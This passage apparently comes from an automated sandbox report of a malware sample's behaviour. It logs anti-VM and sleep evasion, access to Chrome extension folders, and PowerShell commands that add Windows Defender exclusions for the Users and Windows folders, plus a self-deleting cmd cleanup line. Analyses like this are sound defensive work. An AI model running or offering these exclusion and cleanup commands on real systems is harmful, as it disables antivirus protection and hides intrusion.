            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe - Binary or memory string: DIR_WATCH.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe - Binary or memory string: SBIEDLL.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe - Binary or memory string: API_LOG.DLL
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe.0.dr - Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
            Source: C:\Users\user\Desktop\Ttok18.exe - Memory allocated: 11E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Ttok18.exe - Memory allocated: 2E10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Ttok18.exe - Memory allocated: 2C30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 597016
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Ttok18.exe - Window / User API: threadDelayed 1731
            Source: C:\Users\user\Desktop\Ttok18.exe - Window / User API: threadDelayed 8081
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 997
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 426
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7805
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1806
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1220
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 703
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8017
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1575
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1081
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6238
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3509
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -25825441703193356s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -100000s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99797s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99672s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99563s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99438s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99313s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99188s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -99063s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98953s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98842s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98735s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98625s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98515s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98406s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98297s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98187s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -98078s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97969s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97860s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97735s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97610s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97485s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97360s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97235s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -97110s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96985s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96860s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96735s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96610s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96485s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96360s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96235s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -96110s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95984s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95875s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95765s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95656s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95547s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95438s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95328s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95219s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -95094s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94985s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94860s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94735s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94610s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94485s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -94360s >= -30000s
            Source: C:\Users\user\Desktop\Ttok18.exe TID: 3104 - Thread sleep time: -597016s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636 - Thread sleep count: 997 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896 - Thread sleep count: 39 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628 - Thread sleep count: 426 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180 - Thread sleep count: 7805 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212 - Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184 - Thread sleep count: 1806 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 - Thread sleep count: 1220 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384 - Thread sleep count: 703 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456 - Thread sleep count: 8017 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 - Thread sleep count: 1575 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504 - Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624 - Thread sleep count: 1081 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624 - Thread sleep count: 269 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640 - Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720 - Thread sleep count: 6238 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 - Thread sleep count: 3509 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 - Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 5432 - Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\timeout.exe TID: 1464 - Thread sleep count: 90 > 30
            Source: C:\Windows\System32\svchost.exe - File opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - File Volume queried: C:\ FullSizeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_0043A0AE FindFirstFileA, 15_2_0043A0AE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_0041E359 FindFirstFileA, FindFirstFileA, 15_2_0041E359
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_00420370 FindFirstFileA, FindFirstFileA, 15_2_00420370
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_004028FC FindFirstFileA, 15_2_004028FC
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_0042498B FindFirstFileA, FindFirstFileA, 15_2_0042498B
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_0043CE58 FindFirstFileA, 15_2_0043CE58
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_004390C5 FindFirstFileA, memset, memset, 15_2_004390C5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_0043B345 wsprintfA, wsprintfA, FindFirstFileA, 15_2_0043B345
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_00421F18 FindFirstFileA, 15_2_00421F18
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_00402AA5 FindFirstFileA, 15_2_00402AA5
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_004214F2 FindFirstFileA, FindFirstFileA, 15_2_004214F2
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_00439CA9 GetLogicalDriveStringsA, 15_2_00439CA9
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe - Code function: 15_2_004319C9 GetSystemInfo, 15_2_004319C9
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 100000
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99797
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99672
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99563
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99438
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99313
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99188
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 99063
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98953
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98842
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98735
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98625
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98515
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98406
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98297
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98187
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 98078
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97969
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97860
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97735
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97610
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97485
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97360
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97235
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 97110
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96985
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96860
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96735
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96610
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96485
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96360
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96235
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 96110
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95984
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95875
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95765
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95656
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95547
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95438
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95328
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95219
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 95094
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94985
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94860
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94735
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94610
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94485
            Source: C:\Users\user\Desktop\Ttok18.exe - Thread delayed: delay time: 94360
            Source: C:\Users\user\Desktop\Ttok18.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: VMwareVMware
            Source: 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 25aac720-4b65-4596-94df-b9a776dc62c7.exe, 0000000F.00000002.2754848565.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2956431240.000002A458458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2955165395.000002A452E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Ttok18.exe, 00000000.00000002.1995156479.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_0040168C mov eax, dword ptr fs:[00000030h]15_2_0040168C
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004016AA test dword ptr fs:[00000030h], 00000068h15_2_004016AA
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: 15_2_004016BB mov eax, dword ptr fs:[00000030h]15_2_004016BB
            Source: C:\Users\user\Desktop\Ttok18.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Ttok18.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\AAxBDhzeE'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\AAxBDhzeE
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
            Source: C:\Users\user\Desktop\Ttok18.exeProcess created: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe "C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe"
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\TRQIE37YCBIM" & exit
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeCode function: GetLocaleInfoA,15_2_004316FE
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\Desktop\Ttok18.exeQueries volume information: C:\Users\user\Desktop\Ttok18.exe VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeQueries volume information: C:\ VolumeInformation
            Source: C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
